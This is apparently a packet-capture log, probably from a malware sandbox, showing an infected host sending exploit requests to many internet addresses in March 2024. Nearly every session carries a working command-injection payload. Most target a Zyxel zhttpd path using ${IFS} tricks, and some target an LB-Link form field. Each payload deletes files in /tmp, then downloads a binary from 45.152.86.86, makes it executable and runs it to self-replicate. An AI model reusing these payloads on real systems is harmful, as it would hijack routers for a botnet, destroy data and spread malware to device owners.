                              Mar 31, 2024 08:41:30.927041054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5361192.168.2.1343654145.247.48.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927100897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5362192.168.2.1336116111.136.11.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927177906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5363192.168.2.1340474170.41.30.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927220106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5364192.168.2.133892012.188.248.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927300930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5365192.168.2.1338744151.80.26.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927372932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5366192.168.2.1359116221.105.140.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927427053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5367192.168.2.1341352169.246.118.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927485943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5368192.168.2.1344126121.6.33.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927537918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5369192.168.2.134207092.75.164.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927614927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5370192.168.2.1357792130.189.221.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927674055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5371192.168.2.1346148216.149.230.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927731037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5372192.168.2.1336664169.221.113.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927803040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5373192.168.2.1351888134.96.174.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927855968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5374192.168.2.1340018143.245.158.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.927948952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5375192.168.2.1342784117.128.37.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.928003073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5376192.168.2.1351744116.71.184.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.928050041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5377192.168.2.1345546166.31.201.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.928123951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5378192.168.2.1344148179.168.61.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.928174019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5379192.168.2.135149852.185.132.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.928251028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5380192.168.2.1358660186.218.41.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.933986902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5381192.168.2.1356912203.200.5.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.934036016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5382192.168.2.135759054.193.246.368080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:31.066138983 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:31.232243061 CEST929INHTTP/1.1 400
                              Content-Type: text/html;charset=utf-8
                              Content-Language: en
                              Content-Length: 762
                              Date: Sun, 31 Mar 2024 06:41:31 GMT
                              Connection: close
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 6f 72 20 77 69 6c 6c 20 6e 6f 74 20 70 72 6f 63 65 73 73 20 74 68 65 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 73 6f 6d 65 74 68 69 6e 67 20 74 68 61 74 20 69 73 20 70 65 72 63 65 69 76 65 64 20 74 6f 20 62 65 20 61 20 63 6c 69 65 6e 74 20 65 72 72 6f 72 20 28 65 2e 67 2e 2c 20 6d 61 6c 66 6f 72 6d 65 64 20 72 65 71 75 65 73 74 20 73 79 6e 74 61 78 2c 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 20 6d 65 73 73 61 67 65 20 66 72 61 6d 69 6e 67 2c 20 6f 72 20 64 65 63 65 70 74 69 76 65 20 72 65 71 75 65 73 74 20 72 6f 75 74 69 6e 67 29 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 37 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).</p><hr class="line" /><h3>Apache Tomcat/8.5.75</h3></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              5383192.168.2.133993075.110.47.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:31.929425001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5384192.168.2.1335574203.100.18.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:31.929471016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5385192.168.2.135713866.96.209.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:31.929536104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5386192.168.2.133987073.215.77.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:31.929593086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5387192.168.2.134880669.35.118.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.934811115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5388192.168.2.13379922.232.186.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.934874058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5389192.168.2.134379044.239.130.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.934926033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5390192.168.2.1334438143.22.99.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.934957027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5391192.168.2.1348206157.250.13.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935013056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5392192.168.2.133893859.16.45.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935061932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5393192.168.2.135399662.112.163.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935123920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5394192.168.2.1347842157.21.147.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935173035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5395192.168.2.1360528141.6.143.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935221910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5396192.168.2.1341984163.51.107.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935264111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5397192.168.2.134982871.45.202.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935288906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5398192.168.2.1353812134.50.2.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935322046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5399192.168.2.135199880.82.160.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935389996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5400192.168.2.1347960114.207.44.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935431957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5401192.168.2.134052836.102.134.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:32.935478926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5402192.168.2.1352314104.17.195.1758080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:33.337523937 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:33.431972980 CEST328INHTTP/1.1 400 Bad Request
                              Server: cloudflare
                              Date: Sun, 31 Mar 2024 06:41:33 GMT
                              Content-Type: text/html
                              Content-Length: 155
                              Connection: close
                              CF-RAY: -
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              5403192.168.2.1334342184.83.5.368080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:33.384303093 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:36.043041945 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:37.040508032 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:39.040422916 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:43.040885925 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:51.044130087 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              5404192.168.2.1347308145.147.0.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:33.940943956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5405192.168.2.1350206164.209.213.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:33.941014051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5406192.168.2.135295495.150.68.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:34.944333076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5407192.168.2.1359952189.32.93.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:34.944401979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5408192.168.2.1343166107.147.227.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:34.944417000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5409192.168.2.1357036217.250.249.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:34.944536924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5410192.168.2.1360622105.2.196.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954452038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


